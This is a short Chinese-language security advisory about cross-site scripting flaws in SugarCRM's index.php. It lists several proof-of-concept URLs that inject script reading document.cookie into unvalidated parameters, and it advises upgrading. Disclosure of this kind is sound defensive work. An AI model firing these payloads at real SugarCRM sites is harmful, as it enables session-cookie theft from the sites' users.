漏洞描述：跨站脚本漏洞
在主要的脚本（index.php）中有用于写html代码的各种不同的参数没有被确认。
至少下面的网址就很容易被跨站脚本攻击：
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_ /
module="><script>alert(document.cookie)</script>&return_action=index

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_ /
module=&return_action="><script>alert(document.cookie)</script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Sea /
rch

这下面网址是跨站脚本攻击漏洞并且可能远程执行任意PHP代码

漏洞如下：

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><scr /
ipt>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&r /
ecord=[RECORD ID]"><script>alert(document.cookie)</script>

修补方法：升级到最新版本
网址 ： http://sugarcrm.sourceforge.net
发现者： Jose Antonio Coret (Joxean Koret)